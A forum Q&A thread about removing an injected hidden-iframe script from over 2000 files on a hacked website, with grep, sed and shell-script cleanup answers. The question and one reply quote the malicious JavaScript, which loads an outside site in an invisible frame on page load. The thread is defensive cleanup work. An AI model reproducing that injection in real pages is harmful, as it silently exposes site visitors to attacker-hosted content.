Question

Yesterday my site was hacked, and it now has code like:

<script>  
    function frmAdd() { 
        var ifrm = document.createElement('iframe'); 
        ifrm.style.position='absolute'; 
        ifrm.style.top='-999em'; 
        ifrm.style.left='-999em'; 
        ifrm.src = \"http://fenwaywest.com/media/index.php\";
        ifrm.id = 'frmId';
        document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
</script>";

When I search the server using the below command to find the affected files

grep -r "<script>  function frmAdd()" /path/

I got more than 2000 files.

Now I need to remove only that line. Please, can someone give me a command to remove only that line in all 2000 files?


Solution

Back up first! Then, you might try something like this:

grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'

This will delete any line matching that regex. It also assumes the path does not contain spaces (hopefully a reasonable assumption here).

OTHER TIPS

Try to use the CakePHP Sanitize class when printing user data:

echo Sanitize::html($badString);

Did you have any luck cleaning the virus? Because I got the same virus. My site is in Joomla.

EDIT:

I use the code:

grep -lr " function frmAdd" public_html | xargs sed -i '/ function frmAdd/d'

but if you have something like this

    <html><body bgcolor="#FFFFFF"><!--ef09d2--><script>  function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;</script><!--/ef09d2-->
</body></html>

this will return only </body></html>
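
The following is an added example, not part of the original answers: it removes only the injected frmAdd span instead of the whole line, so a page like the one above keeps its <html><body> markup, and it copes with paths that contain spaces. The function names, the .infected backup suffix and the sample page (with a placeholder iframe URL) are assumptions made for the example.

```shell
#!/bin/sh
# Added example: strip only the injected frmAdd <script> span and leave
# any other markup on the same line in place.

NEEDLE='function frmAdd()'   # fixed string that marks an infected file
# BRE for the one-line injection, with optional <!--hex--> ... <!--/hex-->
# wrappers as in the sample above. '.*' is greedy: it assumes a single
# injection per line, which is what the sample shows.
PATTERN='\(<!--[0-9a-f]*-->\)*<script> *function frmAdd().*window\.onload = frmAdd;</script>\(<!--/[0-9a-f]*-->\)*'

# clean_tree DIR: rewrite every infected file under DIR, keeping the
# untouched original as "<file>.infected" (suffix chosen for this example).
clean_tree() {
    find "$1" -type f ! -name '*.infected' -exec sh -c '
        pattern=$1; needle=$2; shift 2
        for f in "$@"; do
            grep -qF "$needle" "$f" || continue
            cp -p "$f" "$f.infected" || exit 1
            sed "s#$pattern##g" "$f.infected" > "$f" || exit 1
            printf "cleaned: %s\n" "$f"
        done
    ' sh "$PATTERN" "$NEEDLE" {} +
}

# remaining DIR: number of files (backups excluded) still containing NEEDLE.
remaining() {
    find "$1" -type f ! -name '*.infected' -exec grep -lF "$NEEDLE" {} + |
        wc -l | tr -d ' '
}

# make_sample DIR: constructed test page; the iframe URL is a placeholder.
make_sample() {
    mkdir -p "$1/sub dir"
    printf '%s\n%s\n' \
      "<html><body bgcolor=\"#FFFFFF\"><!--ef09d2--><script>  function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.src = \"http://placeholder.invalid/\";document.body.appendChild(ifrm);};window.onload = frmAdd;</script><!--/ef09d2-->" \
      "</body></html>" > "$1/sub dir/index page.html"
}

# Usage: clean_tree /path/ ; remaining /path/   (expect 0 afterwards)
```

A file modified this way by an attacker usually means the account or application was writable by them, so the .infected copies are worth keeping for later review of how the injection got in.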

Licensed under: CC-BY-SA with attribution